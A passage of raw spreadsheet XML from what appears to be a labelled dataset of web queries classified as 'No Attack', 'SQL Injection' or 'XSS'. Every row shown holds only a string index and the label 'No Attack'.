    <row r="32730" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32730" s="1" t="s">
        <v>20714</v>
      </c>
      <c r="B32730">
        <v>0</v>
      </c>
      <c r="C32730" s="7" t="str">
        <f t="shared" si="511"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32731" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32731" s="1" t="s">
        <v>28650</v>
      </c>
      <c r="B32731">
        <v>0</v>
      </c>
      <c r="C32731" s="7" t="str">
        <f t="shared" si="511"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32732" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32732" s="1" t="s">
        <v>24309</v>
      </c>
      <c r="B32732">
        <v>0</v>
      </c>
      <c r="C32732" s="7" t="str">
        <f t="shared" si="511"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32733" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32733" s="1" t="s">
        <v>32202</v>
      </c>
      <c r="B32733">
        <v>0</v>
      </c>
      <c r="C32733" s="7" t="str">
        <f t="shared" si="511"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32734" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32734" s="1" t="s">
        <v>27410</v>
      </c>
      <c r="B32734">
        <v>0</v>
      </c>
      <c r="C32734" s="7" t="str">
        <f t="shared" si="511"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32735" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32735" s="1" t="s">
        <v>22811</v>
      </c>
      <c r="B32735">
        <v>0</v>
      </c>
      <c r="C32735" s="7" t="str">
        <f t="shared" si="511"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32736" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32736" s="1" t="s">
        <v>35562</v>
      </c>
      <c r="B32736">
        <v>0</v>
      </c>
      <c r="C32736" s="7" t="str">
        <f t="shared" si="511"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32737" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32737" s="1" t="s">
        <v>35706</v>
      </c>
      <c r="B32737">
        <v>0</v>
      </c>
      <c r="C32737" s="7" t="str">
        <f t="shared" si="511"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32738" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32738" s="1" t="s">
        <v>32829</v>
      </c>
      <c r="B32738">
        <v>0</v>
      </c>
      <c r="C32738" s="7" t="str">
        <f t="shared" si="511"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32739" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32739" s="1" t="s">
        <v>36048</v>
      </c>
      <c r="B32739">
        <v>0</v>
      </c>
      <c r="C32739" s="7" t="str">
        <f t="shared" si="511"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32740" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32740" s="1" t="s">
        <v>29011</v>
      </c>
      <c r="B32740">
        <v>0</v>
      </c>
      <c r="C32740" s="7" t="str">
        <f t="shared" si="511"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32741" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32741" s="1" t="s">
        <v>22754</v>
      </c>
      <c r="B32741">
        <v>0</v>
      </c>
      <c r="C32741" s="7" t="str">
        <f t="shared" si="511"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32742" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32742" s="1" t="s">
        <v>34799</v>
      </c>
      <c r="B32742">
        <v>0</v>
      </c>
      <c r="C32742" s="7" t="str">
        <f t="shared" si="511"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32743" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32743" s="1" t="s">
        <v>35158</v>
      </c>
      <c r="B32743">
        <v>0</v>
      </c>
      <c r="C32743" s="7" t="str">
        <f t="shared" si="511"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32744" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32744" s="1" t="s">
        <v>33563</v>
      </c>
      <c r="B32744">
        <v>0</v>
      </c>
      <c r="C32744" s="7" t="str">
        <f t="shared" si="511"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32745" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32745" s="1" t="s">
        <v>29039</v>
      </c>
      <c r="B32745">
        <v>0</v>
      </c>
      <c r="C32745" s="7" t="str">
        <f t="shared" si="511"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32746" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32746" s="1" t="s">
        <v>30392</v>
      </c>
      <c r="B32746">
        <v>0</v>
      </c>
      <c r="C32746" s="7" t="str">
        <f t="shared" si="511"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32747" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32747" s="1" t="s">
        <v>32744</v>
      </c>
      <c r="B32747">
        <v>0</v>
      </c>
      <c r="C32747" s="7" t="str">
        <f t="shared" si="511"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32748" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32748" s="1" t="s">
        <v>34784</v>
      </c>
      <c r="B32748">
        <v>0</v>
      </c>
      <c r="C32748" s="7" t="str">
        <f t="shared" si="511"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32749" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32749" s="1" t="s">
        <v>21522</v>
      </c>
      <c r="B32749">
        <v>0</v>
      </c>
      <c r="C32749" s="7" t="str">
        <f t="shared" si="511"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32750" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32750" s="1" t="s">
        <v>36495</v>
      </c>
      <c r="B32750">
        <v>0</v>
      </c>
      <c r="C32750" s="7" t="str">
        <f t="shared" si="511"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32751" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32751" s="1" t="s">
        <v>29099</v>
      </c>
      <c r="B32751">
        <v>0</v>
      </c>
      <c r="C32751" s="7" t="str">
        <f t="shared" si="511"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32752" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32752" s="1" t="s">
        <v>23966</v>
      </c>
      <c r="B32752">
        <v>0</v>
      </c>
      <c r="C32752" s="7" t="str">
        <f t="shared" si="511"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32753" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32753" s="1" t="s">
        <v>30872</v>
      </c>
      <c r="B32753">
        <v>0</v>
      </c>
      <c r="C32753" s="7" t="str">
        <f t="shared" si="511"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32754" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32754" s="1" t="s">
        <v>20468</v>
      </c>
      <c r="B32754">
        <v>0</v>
      </c>
      <c r="C32754" s="7" t="str">
        <f t="shared" si="511"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32755" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32755" s="1" t="s">
        <v>20106</v>
      </c>
      <c r="B32755">
        <v>0</v>
      </c>
      <c r="C32755" s="7" t="str">
        <f t="shared" si="511"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32756" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32756" s="1" t="s">
        <v>23849</v>
      </c>
      <c r="B32756">
        <v>0</v>
      </c>
      <c r="C32756" s="7" t="str">
        <f t="shared" si="511"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32757" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32757" s="1" t="s">
        <v>36289</v>
      </c>
      <c r="B32757">
        <v>0</v>
      </c>
      <c r="C32757" s="7" t="str">
        <f t="shared" si="511"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32758" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32758" s="1" t="s">
        <v>26878</v>
      </c>
      <c r="B32758">
        <v>0</v>
      </c>
      <c r="C32758" s="7" t="str">
        <f t="shared" si="511"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32759" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32759" s="1" t="s">
        <v>20383</v>
      </c>
      <c r="B32759">
        <v>0</v>
      </c>
      <c r="C32759" s="7" t="str">
        <f t="shared" si="511"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32760" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32760" s="1" t="s">
        <v>37097</v>
      </c>
      <c r="B32760">
        <v>0</v>
      </c>
      <c r="C32760" s="7" t="str">
        <f t="shared" si="511"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32761" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32761" s="1" t="s">
        <v>36049</v>
      </c>
      <c r="B32761">
        <v>0</v>
      </c>
      <c r="C32761" s="7" t="str">
        <f t="shared" si="511"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32762" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32762" s="1" t="s">
        <v>21487</v>
      </c>
      <c r="B32762">
        <v>0</v>
      </c>
      <c r="C32762" s="7" t="str">
        <f t="shared" si="511"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32763" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32763" s="1" t="s">
        <v>21115</v>
      </c>
      <c r="B32763">
        <v>0</v>
      </c>
      <c r="C32763" s="7" t="str">
        <f t="shared" si="511"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32764" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32764" s="1" t="s">
        <v>31852</v>
      </c>
      <c r="B32764">
        <v>0</v>
      </c>
      <c r="C32764" s="7" t="str">
        <f t="shared" si="511"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32765" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32765" s="1" t="s">
        <v>34885</v>
      </c>
      <c r="B32765">
        <v>0</v>
      </c>
      <c r="C32765" s="7" t="str">
        <f t="shared" si="511"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32766" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32766" s="1" t="s">
        <v>34504</v>
      </c>
      <c r="B32766">
        <v>0</v>
      </c>
      <c r="C32766" s="7" t="str">
        <f t="shared" si="511"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32767" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32767" s="1" t="s">
        <v>23362</v>
      </c>
      <c r="B32767">
        <v>0</v>
      </c>
      <c r="C32767" s="7" t="str">
        <f t="shared" si="511"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32768" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32768" s="1" t="s">
        <v>32302</v>
      </c>
      <c r="B32768">
        <v>0</v>
      </c>
      <c r="C32768" s="7" t="str">
        <f t="shared" si="511"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32769" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32769" s="1" t="s">
        <v>21930</v>
      </c>
      <c r="B32769">
        <v>0</v>
      </c>
      <c r="C32769" s="7" t="str">
        <f t="shared" si="511"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32770" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32770" s="1" t="s">
        <v>31572</v>
      </c>
      <c r="B32770">
        <v>0</v>
      </c>
      <c r="C32770" s="7" t="str">
        <f t="shared" si="511"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32771" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32771" s="1" t="s">
        <v>28514</v>
      </c>
      <c r="B32771">
        <v>0</v>
      </c>
      <c r="C32771" s="7" t="str">
        <f t="shared" ref="C32771:C32834" si="512">IF(B32771=0,"No Attack", IF(B32771=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32772" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32772" s="1" t="s">
        <v>27299</v>
      </c>
      <c r="B32772">
        <v>0</v>
      </c>
      <c r="C32772" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32773" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32773" s="1" t="s">
        <v>20406</v>
      </c>
      <c r="B32773">
        <v>0</v>
      </c>
      <c r="C32773" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32774" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32774" s="1" t="s">
        <v>37469</v>
      </c>
      <c r="B32774">
        <v>0</v>
      </c>
      <c r="C32774" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32775" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32775" s="1" t="s">
        <v>33920</v>
      </c>
      <c r="B32775">
        <v>0</v>
      </c>
      <c r="C32775" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32776" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32776" s="1" t="s">
        <v>27640</v>
      </c>
      <c r="B32776">
        <v>0</v>
      </c>
      <c r="C32776" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32777" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32777" s="1" t="s">
        <v>23604</v>
      </c>
      <c r="B32777">
        <v>0</v>
      </c>
      <c r="C32777" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32778" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32778" s="1" t="s">
        <v>35902</v>
      </c>
      <c r="B32778">
        <v>0</v>
      </c>
      <c r="C32778" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32779" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32779" s="1" t="s">
        <v>32869</v>
      </c>
      <c r="B32779">
        <v>0</v>
      </c>
      <c r="C32779" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32780" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32780" s="1" t="s">
        <v>20392</v>
      </c>
      <c r="B32780">
        <v>0</v>
      </c>
      <c r="C32780" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32781" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32781" s="1" t="s">
        <v>23815</v>
      </c>
      <c r="B32781">
        <v>0</v>
      </c>
      <c r="C32781" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32782" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32782" s="1" t="s">
        <v>30215</v>
      </c>
      <c r="B32782">
        <v>0</v>
      </c>
      <c r="C32782" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32783" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32783" s="1" t="s">
        <v>20941</v>
      </c>
      <c r="B32783">
        <v>0</v>
      </c>
      <c r="C32783" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32784" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32784" s="1" t="s">
        <v>24102</v>
      </c>
      <c r="B32784">
        <v>0</v>
      </c>
      <c r="C32784" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32785" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32785" s="1" t="s">
        <v>32566</v>
      </c>
      <c r="B32785">
        <v>0</v>
      </c>
      <c r="C32785" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32786" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32786" s="1" t="s">
        <v>29166</v>
      </c>
      <c r="B32786">
        <v>0</v>
      </c>
      <c r="C32786" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32787" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32787" s="1" t="s">
        <v>22358</v>
      </c>
      <c r="B32787">
        <v>0</v>
      </c>
      <c r="C32787" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32788" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32788" s="1" t="s">
        <v>31702</v>
      </c>
      <c r="B32788">
        <v>0</v>
      </c>
      <c r="C32788" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32789" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32789" s="1" t="s">
        <v>35056</v>
      </c>
      <c r="B32789">
        <v>0</v>
      </c>
      <c r="C32789" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32790" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32790" s="1" t="s">
        <v>27231</v>
      </c>
      <c r="B32790">
        <v>0</v>
      </c>
      <c r="C32790" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32791" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32791" s="1" t="s">
        <v>29045</v>
      </c>
      <c r="B32791">
        <v>0</v>
      </c>
      <c r="C32791" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32792" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32792" s="1" t="s">
        <v>20165</v>
      </c>
      <c r="B32792">
        <v>0</v>
      </c>
      <c r="C32792" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32793" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32793" s="1" t="s">
        <v>23656</v>
      </c>
      <c r="B32793">
        <v>0</v>
      </c>
      <c r="C32793" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32794" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32794" s="1" t="s">
        <v>29803</v>
      </c>
      <c r="B32794">
        <v>0</v>
      </c>
      <c r="C32794" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32795" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32795" s="1" t="s">
        <v>35115</v>
      </c>
      <c r="B32795">
        <v>0</v>
      </c>
      <c r="C32795" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32796" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32796" s="1" t="s">
        <v>20221</v>
      </c>
      <c r="B32796">
        <v>0</v>
      </c>
      <c r="C32796" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32797" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32797" s="1" t="s">
        <v>29751</v>
      </c>
      <c r="B32797">
        <v>0</v>
      </c>
      <c r="C32797" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32798" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32798" s="1" t="s">
        <v>30884</v>
      </c>
      <c r="B32798">
        <v>0</v>
      </c>
      <c r="C32798" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32799" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32799" s="1" t="s">
        <v>36462</v>
      </c>
      <c r="B32799">
        <v>0</v>
      </c>
      <c r="C32799" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32800" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32800" s="1" t="s">
        <v>32364</v>
      </c>
      <c r="B32800">
        <v>0</v>
      </c>
      <c r="C32800" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32801" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32801" s="1" t="s">
        <v>30711</v>
      </c>
      <c r="B32801">
        <v>0</v>
      </c>
      <c r="C32801" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32802" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32802" s="1" t="s">
        <v>27556</v>
      </c>
      <c r="B32802">
        <v>0</v>
      </c>
      <c r="C32802" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32803" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32803" s="1" t="s">
        <v>36493</v>
      </c>
      <c r="B32803">
        <v>0</v>
      </c>
      <c r="C32803" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32804" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32804" s="1" t="s">
        <v>32056</v>
      </c>
      <c r="B32804">
        <v>0</v>
      </c>
      <c r="C32804" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32805" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32805" s="1" t="s">
        <v>30011</v>
      </c>
      <c r="B32805">
        <v>0</v>
      </c>
      <c r="C32805" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32806" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32806" s="1" t="s">
        <v>21233</v>
      </c>
      <c r="B32806">
        <v>0</v>
      </c>
      <c r="C32806" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32807" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32807" s="1" t="s">
        <v>28072</v>
      </c>
      <c r="B32807">
        <v>0</v>
      </c>
      <c r="C32807" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32808" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32808" s="1" t="s">
        <v>22303</v>
      </c>
      <c r="B32808">
        <v>0</v>
      </c>
      <c r="C32808" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32809" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32809" s="1" t="s">
        <v>28838</v>
      </c>
      <c r="B32809">
        <v>0</v>
      </c>
      <c r="C32809" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32810" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32810" s="1" t="s">
        <v>34073</v>
      </c>
      <c r="B32810">
        <v>0</v>
      </c>
      <c r="C32810" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32811" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32811" s="1" t="s">
        <v>28244</v>
      </c>
      <c r="B32811">
        <v>0</v>
      </c>
      <c r="C32811" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32812" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32812" s="1" t="s">
        <v>31445</v>
      </c>
      <c r="B32812">
        <v>0</v>
      </c>
      <c r="C32812" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32813" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32813" s="1" t="s">
        <v>33798</v>
      </c>
      <c r="B32813">
        <v>0</v>
      </c>
      <c r="C32813" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32814" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32814" s="1" t="s">
        <v>34462</v>
      </c>
      <c r="B32814">
        <v>0</v>
      </c>
      <c r="C32814" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32815" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32815" s="1" t="s">
        <v>35156</v>
      </c>
      <c r="B32815">
        <v>0</v>
      </c>
      <c r="C32815" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32816" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32816" s="1" t="s">
        <v>33875</v>
      </c>
      <c r="B32816">
        <v>0</v>
      </c>
      <c r="C32816" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32817" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32817" s="1" t="s">
        <v>31660</v>
      </c>
      <c r="B32817">
        <v>0</v>
      </c>
      <c r="C32817" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32818" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32818" s="1" t="s">
        <v>27816</v>
      </c>
      <c r="B32818">
        <v>0</v>
      </c>
      <c r="C32818" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32819" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32819" s="1" t="s">
        <v>23340</v>
      </c>
      <c r="B32819">
        <v>0</v>
      </c>
      <c r="C32819" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32820" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32820" s="1" t="s">
        <v>21348</v>
      </c>
      <c r="B32820">
        <v>0</v>
      </c>
      <c r="C32820" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32821" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32821" s="1" t="s">
        <v>30459</v>
      </c>
      <c r="B32821">
        <v>0</v>
      </c>
      <c r="C32821" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32822" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32822" s="1" t="s">
        <v>21369</v>
      </c>
      <c r="B32822">
        <v>0</v>
      </c>
      <c r="C32822" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32823" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32823" s="1" t="s">
        <v>20844</v>
      </c>
      <c r="B32823">
        <v>0</v>
      </c>
      <c r="C32823" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32824" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32824" s="1" t="s">
        <v>27951</v>
      </c>
      <c r="B32824">
        <v>0</v>
      </c>
      <c r="C32824" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32825" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32825" s="1" t="s">
        <v>23274</v>
      </c>
      <c r="B32825">
        <v>0</v>
      </c>
      <c r="C32825" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32826" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32826" s="1" t="s">
        <v>24167</v>
      </c>
      <c r="B32826">
        <v>0</v>
      </c>
      <c r="C32826" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32827" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32827" s="1" t="s">
        <v>20464</v>
      </c>
      <c r="B32827">
        <v>0</v>
      </c>
      <c r="C32827" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32828" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32828" s="1" t="s">
        <v>36067</v>
      </c>
      <c r="B32828">
        <v>0</v>
      </c>
      <c r="C32828" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32829" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32829" s="1" t="s">
        <v>30793</v>
      </c>
      <c r="B32829">
        <v>0</v>
      </c>
      <c r="C32829" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32830" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32830" s="1" t="s">
        <v>27845</v>
      </c>
      <c r="B32830">
        <v>0</v>
      </c>
      <c r="C32830" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32831" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32831" s="1" t="s">
        <v>33753</v>
      </c>
      <c r="B32831">
        <v>0</v>
      </c>
      <c r="C32831" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32832" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32832" s="1" t="s">
        <v>30352</v>
      </c>
      <c r="B32832">
        <v>0</v>
      </c>
      <c r="C32832" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32833" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32833" s="1" t="s">
        <v>32052</v>
      </c>
      <c r="B32833">
        <v>0</v>
      </c>
      <c r="C32833" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32834" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32834" s="1" t="s">
        <v>32918</v>
      </c>
      <c r="B32834">
